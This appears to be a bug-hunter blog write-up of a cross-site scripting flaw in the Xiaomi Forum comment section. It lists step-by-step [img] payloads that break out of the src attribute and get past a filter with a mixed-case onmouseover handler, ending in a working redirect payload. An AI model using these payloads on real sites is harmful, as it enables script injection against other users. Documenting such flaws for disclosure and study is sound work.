Exploiting XSS via Markdown on Xiaomi

Exploiting XSS via Markdown on Xiaomi

Exploiting XSS via Markdown on Xiaomi Bahasa Indonesia  |  English

What is Markdown?

Markdown is a text-to-HTML conversion tool that can be used when creating web content. By using Markdown, we can write HTML content in a format that is easy-to-read and easy-to-write. (Source: www.codepolitan.com)

This vulnerability is in the comments section of the Xiaomi Forum (c.mi.com).


First, I try to post images in the comments,
Payloads:
[img]https://server/image.jpg[/img]
Response:
<img src="https://server/image.jpg" />

Next, I try to insert double quotes after the image URL,
Payloads:
[img]https://server/image.jpg"[/img]
Response:
<img src="https://server/image.jpg"" />

Now let's try to insert the JavaScript event handler attribute,
Payloads:
[img]https://server/image.jpg"onmouseover=[/img]
Response:
<img src="https://server/image.jpg%22onmouseover=" />

The server immediately changes the character (") to %22, now I try to use some uppercase in the event handler,
Payloads:
[img]https://server/image.jpg"OnMoUsEoVeR=[/img]
Response:
<img src="https://server/image.jpg"OnMoUsEoVeR=" />

Next, the final payloads,
Payloads:
[img]https://server/image.jpg"OnMoUsEoVeR=window.location="//google.com[/img]
Response:
<img src="https://server/image.jpg"OnMoUsEoVeR=window.location="//google.com" />



#HappyHacking

Related Post: